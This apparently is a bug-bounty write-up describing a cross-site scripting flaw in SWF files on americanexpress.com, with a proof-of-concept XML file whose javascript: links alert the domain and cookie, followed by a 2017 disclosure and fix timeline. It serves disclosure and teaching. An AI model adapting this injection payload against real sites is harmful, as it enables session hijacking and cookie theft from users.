Exploiting XSS in SWF on AmericanExpress

The last month I was playing with some google dorks related with SWF files. When, I found two interesting files in the domain www.americanexpress.com

The files SWF had a parameter in the url whose input was a XML file. This file contained the information that was processed and showed by the SWF file.

Firstly, I checked that the domain allows to do external requests. Then I should change the original XML by my XML file.

This XML contained some JS code in order to execute JS in the www.americanexpress.com context.

I used the following XML file

XML as PoC

<main>
   <settings>
   </settings>
   <top_options>
      <option id="0">
         <title><![CDATA[Proof of concept 0]]></title>
         <body><![CDATA[<a href='javascript:alert(document.domain)'>Click me (domain)</a>]]></body>
      </option>
      <option id="1">
         <title><![CDATA[Proof of concept 1]]></title>
         <body><![CDATA[<a href='javascript:alert(document.domain)'>Click me (domain)</a>]]></body>
      </option>
      <option id="2">
         <title><![CDATA[Proof of concept 2]]></title>
         <body><![CDATA[<a href='javascript:alert(document.cookie)'>Click me (cookie)</a>]]></body>
      </option>
   </top_options>
</main>

Finally, when the user clicked over the option "Click me (domain)" so the JS code had been executed successfully.

XML loaded
load_xml

XSS executed
js_code_executed

Timeline:

  • 2 Nov 2017 - DM via Twitter to @AmericanExpress
  • 6 Nov 2017 - Response from @AmericanExpress
  • 6 Nov 2017 - Report vulnerability to email contact
  • 6 Nov 2017 - Response from security Team
  • 10 Nov 2017 - Vulnerabilities fixed
  • 17 Nov 2017 - Reward bounty received
  • 14 Dic 2017 - Write-up published